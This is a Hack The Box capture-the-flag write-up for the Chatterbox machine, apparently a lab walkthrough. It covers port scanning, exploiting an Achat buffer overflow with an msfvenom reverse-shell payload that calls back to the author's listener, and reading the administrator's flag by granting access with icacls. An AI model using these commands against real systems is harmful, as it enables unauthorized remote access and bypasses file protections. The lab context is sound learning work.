# CHATTERBOX | 10.10.10.74

## Initial Enumeration - nmap

    nmap -T4 -v -sC -sV -oN nmap/initial 10.10.10.74

This scan brought zero results, so a full scan was necessary:

    nmap -T5 --max-retries=0 -v -p- -oN nmap/all-ports 10.10.10.74

Finally after an eternity there were some results.

### Open Ports and their services

* 9255 - HTTP - Achat chat system
* 9256 - ACHAT - Achat chat system

### OS Discovery

Some kind of Windows box, perhaps Windows 2008

## Service Enumeration

Navigating to the address and port 9255 (which indicated http) in a web browser revealed nothing. Same with netcat and curl.

Searchsploit nets a remote buffer overflow vuln, with two versions, one python one Metasploit:

![searchsploit](img/searchsploit-achat.png)

However, I am not sure what version of Achat is running, but since this a Hack the Box machine it's a safe bet it is running the vulnerable version, 0.150 beta7.

## Exploitation

### Achat Remote Buffer Overflow

The python exploit contains example code for spawning the calculator on the victim machine, meaning code execution is possible. I just need to add my own custom reverse shell payload in place of the code as well as change the target IP.   
I will use msfvenom for this:

    msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.31 LPORT=6969 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

This command spat out a lot of code, and several encoders failed to encode before one finally worked. The payload size is 702, larger than the POC code, so I hope it's not too much.

![buff](img/buf.png)

OK, so I have a netcat listener set up, waiting to catch the shell:

    ncat -nvlp 6969

Now, all that's left is to trigger the exploit, and this is the result:

![shell](img/user-shell.png)

## User Enumeration

sysinfo indicated a **Windows 7 Professional SP1** machine, with loads of hotfixes installed.

Before I forget, here is the user flag for proof:

![userflag](img/user-flag.png)

After this, I noticed that this user could navigate to and read the contents of the Administrator's directories, which is nonstandard. The root.txt is out of reach however:

![dir](img/dir.png)

This needs more looking into, because a misconfiguration of file and/or directory permissions could be the route to privesc.

## Privilege Escalation

After some searching, I found that I should play around with the _icacls_ command to learn more about the access controls on the admin folder:

    icacls c:\users\administrator\desktop
    icacls c:\users\administrator\desktop\root.txt

![icacls](img/icacls.png)

This shows that alfred has full access to the dir, but only the administrator can currently view the text file.  
The example provided helpfully shows me the command I need to type in order to get access to the file:

    icacls root.txt /grant alfred:F

![rootflag](img/root-flag.png)

And that is basically it, even though I don't actually have root access. Maybe I'll return to this box one day and try other method.

## Conclusion

This was a pretty simple box. The only frustration was the port scanning which took a while because this box was using non-standard ports. So I got the root flag by:

* Exploiting a remote buffer overflow vulnerability in the AChat program in order to execute code that gave me a reverse shell
* Enumerating the user to find that they had full access to the Administrators dirs
* Granting the user full access to the sensitive file contained in the Administrator dir.
